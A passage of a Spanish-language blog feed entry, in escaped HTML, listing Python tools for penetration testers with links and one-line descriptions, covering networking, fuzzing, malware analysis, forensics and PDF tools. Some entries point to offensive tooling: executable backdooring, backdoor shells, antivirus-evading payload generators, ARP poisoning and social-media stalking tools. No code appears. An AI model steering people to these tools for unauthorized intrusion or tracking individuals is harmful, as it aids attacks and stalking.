Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://bitbucket.org/secretsquirrel/the-backdoor-factory/overview" target="_blank"&gt;The Backdoor Factory&lt;/a&gt;: un interesante script en Python para "&lt;i&gt;backdoorizar&lt;/i&gt;" ejecutables y librerías de Windows (Win32 PE). &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/creaktive/tsh" target="_blank"&gt;Tiny SHell&lt;/a&gt;: el clásico backdoor de código abierto en Python de Christophe Devine&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/infodox/tsh-sctp" target="_blank"&gt;TinySHell bajo SCTP&lt;/a&gt;: un backdoor de Unix un poquito más indetectable&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/ChrisTruncer/Veil" target="_blank"&gt;Veil&lt;/a&gt;:  herramienta escrita en Python por Christopher Truncer para crear  payloads de Metasploit capaces de evadir la mayoría de los antivirus.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://blog.didierstevens.com/2013/12/02/4-times-faster-virustotal-search-py/" target="_blank"&gt;virustotal-search.py&lt;/a&gt;:  script para automatizar desde la línea de comandos el análisis de una  muestra de malware a través del conocido servicio de multiAV de  Virustotal. &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Forense:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/aft/"&gt;aft&lt;/a&gt;: Android forensic toolkit&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/milo2012/osintstalker/" target="_blank"&gt;FBStalker y GeoStalker&lt;/a&gt;:  herramienta OSINT para Facebook y fuentes de geolocalización - Flickr,  Instagram, Twitter, Wigle. Los ID de usuario encontrados son utilizados  para encontrar cuentas de redes sociales a través de otras redes como  Facebook, Youtube, Instagram, Google+, Linkedin y Google Search &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://bitbucket.org/grampusteam/grampus" target="_blank"&gt;Grampus&lt;/a&gt;: herramienta multiplataforma de extracción de metadatos y footprinting, algo así como una FOCA en python y de código abierto. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/libforensics/"&gt;LibForensics&lt;/a&gt;: librería para desarrollar aplicaciones forenses digitales&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.arizona4n6.com/download/SQLite-Parser.zip" target="_blank"&gt;sqlparse.py&lt;/a&gt;: parser para recuperar datos borrados de bases de datos SQLite &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://mark0.net/code-tridlib-e.html"&gt;TrIDLib:&lt;/a&gt; identifica los tipos de archivo de sus firmas binarias. Ahora incluye Python &lt;i&gt;binding&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://www.volatilesystems.com/default/volatility/"&gt;Volatility&lt;/a&gt;: extrae y analiza artefactos digitales de la memoria volátil (RAM)&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Análisis de malware:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.decalage.info/exefilter"&gt;Exefilter&lt;/a&gt;:  filtra formatos de archivo en mensajes de correo electrónico, páginas  web o archivos. Detecta muchos formatos de archivo comunes y puede  eliminar contenido.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/jipegit/OSXAuditor" target="_blank"&gt;OS X Auditor:&lt;/a&gt; herramienta gratuita de análisis forense para Mac OS X. &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/phoneyc/"&gt;phoneyc&lt;/a&gt;: implementacion de honeyclient totalmente escrito en python &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/pyew/"&gt;pyew&lt;/a&gt;: editor hexadecimal y desensamblador en &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;línea de comandos&lt;/span&gt;&lt;/span&gt;, principalmente usado para analizar malware&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://xael.org/norman/python/pyclamav/index.html"&gt;pyClamAV&lt;/a&gt;:&amp;nbsp; añade capacidades de detección de virus para tu software Python&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://securityxploded.com/pymal.php"&gt;pyMal&lt;/a&gt;: framework para análisis de malware basada en Pefile, Pydbg y Volatility.&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://code.google.com/p/jsunpack-n/"&gt;jsunpack-n&lt;/a&gt;: unpacker de &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;JavaScript &lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;genérico&lt;/span&gt;&lt;/span&gt;: emula la funcionalidad del navegador para detectar  exploits dirigidos a explotar vulnerabilidades en navegadores y plugins&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/yara-project/source/browse/trunk/yara-python/README"&gt;yara-python&lt;/a&gt;: identifica y clasifica muestras de malware&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;  &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;PDF:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://blog.didierstevens.com/programs/pdf-tools"&gt;Didier Stevens' PDF tools&lt;/a&gt;: analiza, identifica y crea ficheros PDF (incluye &lt;a href="http://blog.didierstevens.com/programs/pdf-tools/#pdfid"&gt;PDFiD&lt;/a&gt;, &lt;a href="http://blog.didierstevens.com/programs/pdf-tools/#pdf-parser"&gt;pdf-parser&lt;/a&gt;, &lt;a href="http://blog.didierstevens.com/programs/pdf-tools/#make-pdf"&gt;make-pdf&lt;/a&gt; y mPDF)&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/opaf/"&gt;Opaf&lt;/a&gt;: Open Framework Analysis PDF . Convierte PDF a un árbol XML que puede ser analizado y modificado.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.decalage.info/python/origapy"&gt;Origapy&lt;/a&gt;: wrapper de Python para el módulo de Ruby Origami que desinfecta archivos PDF&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.unixuser.org/%7Eeuske/python/pdfminer/index.html"&gt;PDFMiner&lt;/a&gt;: extrae texto de ficheros PDF&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://pybrary.net/pyPdf/"&gt;pyPDF&lt;/a&gt;: Python PDF toolkit: extrae info, corta, une, cifra, descifra...&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/python-poppler-qt4/"&gt;python-poppler-qt4&lt;/a&gt;: une Python con la librería Poppler PDF, incluyendo soporte Qt4 &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Miscelaneas:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://corelabs.coresecurity.com/index.php?module=Wiki&amp;amp;action=view&amp;amp;type=tool&amp;amp;name=Exomind"&gt;Exomind&lt;/a&gt;:  para la creación de gráficos y el desarrollo de módulos de inteligencia  de código abierto, centrada en servicios de redes sociales, motores de  búsqueda y mensajería instantánea&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://bitbucket.org/haypo/hachoir/wiki/Home"&gt;Hachoir&lt;/a&gt;: permite ver y editar un stream binario campo por campo &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://oss.coresecurity.com/projects/inlineegg.html"&gt;InlineEgg&lt;/a&gt;: toolbox de clases para escribir pequeños programas en Python&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.google.com/p/pymangle/"&gt;PyMangle&lt;/a&gt;:  herramienta de línea de comandos y una biblioteca de Python utilizada  para crear listas de palabras para su uso con otras herramientas de  pruebas de intrusión&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.securityfocus.com/tools/3851"&gt;RevHosts&lt;/a&gt;: enumera los &lt;i&gt;virtual hosts&lt;/i&gt; de una dirección IP dada&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://github.com/simplejson/simplejson/"&gt;simplejson&lt;/a&gt;: JSON encoder/decoder, para por ej. usar &lt;a href="http://dcortesi.com/2008/05/28/google-ajax-search-api-example-python-code/"&gt;Google's AJAX API&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;  &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Otras herramientas y librerías útiles:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.crummy.com/software/BeautifulSoup/"&gt;Beautiful Soup&lt;/a&gt;: HTML parser optimizado para &lt;i&gt;screen-scraping&lt;/i&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://ipython.scipy.org/"&gt;IPython&lt;/a&gt;:  shell Python interactivo y mejorado con algunas características para la  introspección de objetos, acceso a una consola del sistema y su propio  sistema &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;especial &lt;/span&gt;&lt;/span&gt;de comandos&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://lxml.de/"&gt;lxml&lt;/a&gt;: librería más rica en características y fácil de usar para trabajar con XML y HTML&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://chandlerproject.org/bin/view/Projects/MeTooCrypto"&gt;M2Crypto&lt;/a&gt;: wrapper &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;OpenSSL&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt; más completo&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://matplotlib.sourceforge.net/"&gt;matplotlib&lt;/a&gt;: construye gráficos 2D de matrices&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://code.enthought.com/projects/mayavi/"&gt;Mayavi&lt;/a&gt;: 3D de visualización de datos científicos y &lt;i&gt;plotting&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://networkx.lanl.gov/"&gt;NetworkX&lt;/a&gt;: librería gráfica (bordes, nodos)&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://pandas.pydata.org/"&gt;Pandas&lt;/a&gt;:  librería que proporciona mayor rendimiento y mayor facilidad de uso  para analizar estructuras de datos de alto rendimiento y herramientas de  análisis de datos&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.noah.org/wiki/Pexpect"&gt;Pexpect&lt;/a&gt;: controla y automatiza otros programas, similar al sistema &lt;i&gt;Don Libes `Expect&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.riverbankcomputing.co.uk/software/pyqt"&gt;PyQt&lt;/a&gt; y &lt;a href="http://www.pyside.org/"&gt;PySide&lt;/a&gt;: Python bindings para el framework Qt y librería GUI &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://pyparsing.wikispaces.com/"&gt;pyparsing&lt;/a&gt;: módulo de &lt;i&gt;parsing &lt;/i&gt;general&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.secdev.org/projects/rtgraph3d/"&gt;RTGraph3D&lt;/a&gt;: crea gráficos dinámicos en 3D&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://groups.csail.mit.edu/uid/sikuli/"&gt;Sikuli&lt;/a&gt;, tecnología visual para buscar y automatizar interfaces gráficas de usuario con capturas de pantalla. Programable en &lt;a href="http://www.jython.org/"&gt;Jython&lt;/a&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://fedorahosted.org/suds/"&gt;Suds&lt;/a&gt;:&amp;nbsp; cliente SOAP ligero para servicios Web&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://twistedmatrix.com/"&gt;Twisted&lt;/a&gt;: motor de creación de redes basada en eventos&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://bitbucket.org/mchaput/whoosh/"&gt;Whoosh&lt;/a&gt;: rápido, con muchas características de indexación de texto completo y búsqueda de librería implementado en Python &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Source&lt;/b&gt;: &lt;a href="http://www.hackplayers.com/2013/11/recopilacion-de-herramientas-en-python-para-pentesters.html#more" target="_blank"&gt;&lt;i&gt;Hackplayers&lt;/i&gt;&lt;/a&gt;</description><link>http://kode-labs.blogspot.com/2013/12/recopilacion-herramientas-python-para.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/-CiK6bODD3jg/UqB9MOaF1RI/AAAAAAAAA20/UnmSKmRiWkM/s72-c/python_ninja.png" width="72"/><enclosure length="38291" type="application/zip" url="http://www.fuzzing.org/wp-content/SMUDGE.zip"/><itunes:explicit/><itunes:subtitle>Si estás involucrado en la investigación de vulnerabilidades, ingeniería inversa o pruebas de intrusión, seguro que ya habrás utilizado Python porque cuenta con un rico conjunto de librerías y herramientas útiles para estos menesteres. En la página de Dirk Loss podemos encontrar un gran recopilatorio de herramientas escritas en Python para penetration testers, algunas de ellas sólo enlaces a librerías C existentes, es decir, herramientas que hacen las librerías fácilmente utilizables desde programas de Python. Sin embargo, por la difusa situación jurídica en Alemania no se incluyen algunas de las herramientas más agresivas (frameworks PenTest, smashers bluetooth, escáneres de vulnerabilidades de aplicaciones Web, war-dialers, etc.). Por ello y para tener una lista aún más completa, vamos a ir añadiendo todas las herramientas que vayamos encontrando. No dudes en comentar esta entrada si conoces alguna más y quieres que la añadamos a esta lista: &amp;nbsp; Red: Dirtbags py-pcap: lee ficheros pcap sin libpcapdpkt: rápida y simple creación de paquetes y análisis, con las definiciones básicas de los protocolos TCP/IP&amp;nbsp; flowgrep: grep a través de payloads de paquetes utilizando expresiones regularesglastopf: honeypot que se basa en un pequeño servidor web que emula cientos de vulnerabilidades. Impacket: modifica y decodifica paquetes de red. Incluye soporte para los protocolos de más alto nivel, tales como NMB y SMB Knock Subdomain Scan:&amp;nbsp; enumera los subdominios de un dominio de destino a través de una lista de palabrasLANs.py: herramienta capaz de falsificar y envenenar la tabla de ARP de un objetivo individual. Es multihilo y asíncrono. libdnet: rutinas de red de bajo nivel, incluyendo la interfaz de búsqueda y transmisión de tramas Ethernet Mallory: proxy man-in-the-middle extensible TCP/UDP, soporta la modificación de protocolos no estandar al vuelopypcap, Pcapy y pylibpcap: varios enlaces Python para libpcap Pytbull: framework de pruebas de IDS/IPS muy flexible (incluye más de 300 tests)pynids: wrapper de libnids que incluye sniffing, IP defragmentation, reensamblado de streams TCP y detección de escaneos de puertosScapy: envia, rastrea y analiza y crea paquetes de red. Se puede usar de forma interactiva o como una librería Depuración e ingeniería inversa: Androguard: ingeniería inversa y análisis de aplicaciones de Androidapk-jet: un wrap de apktool en python para automatizar y hacer más fácil la ingeniería inversa de apks&amp;nbsp;AsmJit: sencillo wrapper en Python para AsmJit usando SWIG. AsmJit posee clases de generación de código de alto nivel que pueden utilizarse para crear código JITBeaEnginePython: bindings de BeaEngine en Python de Mario Vilas.&amp;nbsp;Binwalk: es una herramienta de análisis firmware diseñada para ayudar en el análisis, la extracción y la ingeniería inversa de imágenes del firmware y otros blobs binarios. Es fácil de utilizar, completamente programable y se puede extender fácilmente a través de firmas personalizadas, reglas de extracción y módulos de plugin.bochs-python-instrumentation: Este parche para Bochs proporciona un intérprete de Python en lugar del propio depurador Bochs, proporcionando la funcionalidad del depurador. También permite interactuar con la interfaz de instrumentación bajo demanda, al asociar dinámicamente métodos de Python para manejar eventos de instrumentación.Buggery: wrapper python para DbgEng.&amp;nbsp;ctypes: módulo de Python que permite crear y manipular tipos de datos de C en Python. Estos luego pueden pasar a funciones C cargadas desde librerías de vínculos dinámicos.Cuckoo: sistema sandbox de análisis de malware automatizado. Tiene un API para personalizar tanto el procesamiento como las etapas de presentación de informes.&amp;nbsp;Darm: Un ligero y eficiente desensamblador escrito en C para el conjunto de instrucciones ARMv7Deviare: es una API para hooks diseñada para crear productos de usuario finalDiabind: Python binding de DIA (Debug Interface Access) SDKDislib: Librería python para leer ficheros PE+ diStorm:&amp;nbsp; biblioteca de desensamblador para AMD64, bajo licencia BSDIDAPython: plugin de IDA Pro que integra Python, permitiendo ejecutar scripts en IDA ProImmunity Debugger: GUI programable y debugger en linea de comandosPaimei: framework de ingeniería inversa, incluye PyDBG, PIDA, pGRAPHpefile: permite leer y trabajar con archivos Portable Executable (PE)&amp;nbsp;pydasm: interfaz en Python para la librería libdasm de desensamblado x86PyDbgEng: wrapper en Python para el motor de depuración de Microsoft Windows&amp;nbsp;PyEMU: emulador IA-32 completamente programable, útil para análisis de malwarepython-ptrace:depurador usando ptrace (Linux, BSD y Darwin system call para trazar procesos) escrito en Pythonmona.py: PyCommand para Immunity Debugger que reemplaza y mejora pvefindaddruhooker: intercepta llamadas a llamadas a la API dentro de DLLs , así como las direcciones arbitrarias en el archivo ejecutable en la memoriavdb / vtrace: API de depuración de procesos multi-plataforma implementado en python, y vdb es un depurador que lo utiliza Fuzzing: antiparser: fuzz testing y API de inyección de fallosConstruct: librería para parsear y construir estructuras de datos (binario o texto).&amp;nbsp;&amp;nbsp; Forensic Fuzzing Tools: genera ficheros fuzzeados, sistemas de ficheros, y sistemas de ficheros con ficheros fuzzeados para probar la robustez de herramientas forenses y sistemas de análisis&amp;nbsp;Fusil: librería en Python usada para escribir programas de fuzzing&amp;nbsp;fuzzer.py (feliam): fuzzer sencillo de Felipe Andres Manzano&amp;nbsp;Fuzzbox: multi-codec media fuzzerMistress: genera formatos de archivos al vuelo y protocolos con datos malformados, basados en patrones predefinidos Peach Fuzzing Platform: framework de fuzzing extensible para la generación y la mutación basada en fuzzing (la v2 fue escrita en Python) Powerfuzzer: fuzzer web altamente automatizado y totalmente personalizable (protocolo HTTP basado en fuzzer de aplicación)SMUDGE&amp;nbsp; Sulley: framework de desarrollo fuzzer y pruebas que consiste en varios componentes extensiblesTAOF: (el Arte del Fuzzing) incluye ProxyFuzz, un fuzzer man-in -the-middle de red no deterministauntidy: fuzzer XML de propósito generalWindows IPC Fuzzing Tools: herramientas para fuzzear aplicaciones que usan mecanimos Windows Interprocess CommunicationWSBang: ejecuta pruebas automáticas contra servicios web SOAP Web: FunkLoad: medidor de carga web funcionalGhost.py: cliente webkit escrito en Python&amp;nbsp;HTTPie: cliente http similar a cURL pero más intuitivo.&amp;nbsp;mitmproxy: proxy HTTP de interceptación con soporte SSL. Permite inspeccionar y editar tráfico al vuelo.&amp;nbsp; Requests: librería HTTP sencilla y elegante, hecha para seres humanosTwill: navega por Internet mediante un interface en línea de comandos. Soporta web testing automatizadopathod / pathoc: demonio/cliente para saturar clientes y servidores HTTPProxMon: procesa logs de proxy y crea informes con los resultadospython-spidermonkey: binding para el motor JavaScript de Mozilla SpiderMonkey; permite llamar y evaluar scripts y funciones JavascriptSelenium: API para escribir pruebas funcionales usando el WebDriver Selenium para acceso a Firefox, Ie, Chrome, Remote etc.&amp;nbsp; Splinter: herramienta para testear aplicaciones web usando Python que permite automatizar acciones del navegador como visitar URLs e interactuar con sus objetos. spynner: módulo de navegación web programable para Python con soporte Javascript/AJAXWSMap: encuentra servicios web y descubre ficherosWindmill: herramienta de pruebas creada para automatizar y depurar aplicaciones webCracking: findmyhash:&amp;nbsp; script en Python para crackear hashes usando servicios online.Malware: Noriben: script que funciona en conjunción con Procmon de Sysinternals para analizar malware en sandbox. s7-brute-offline.py: herramienta que que puede realizar ataques off-line de fuerza bruta contra controladores lógicos programables (PLCs) Siemens. The Backdoor Factory: un interesante script en Python para "backdoorizar" ejecutables y librerías de Windows (Win32 PE). Tiny SHell: el clásico backdoor de código abierto en Python de Christophe DevineTinySHell bajo SCTP: un backdoor de Unix un poquito más indetectable&amp;nbsp;Veil: herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus.virustotal-search.py: script para automatizar desde la línea de comandos el análisis de una muestra de malware a través del conocido servicio de multiAV de Virustotal. Forense: aft: Android forensic toolkitFBStalker y GeoStalker: herramienta OSINT para Facebook y fuentes de geolocalización - Flickr, Instagram, Twitter, Wigle. Los ID de usuario encontrados son utilizados para encontrar cuentas de redes sociales a través de otras redes como Facebook, Youtube, Instagram, Google+, Linkedin y 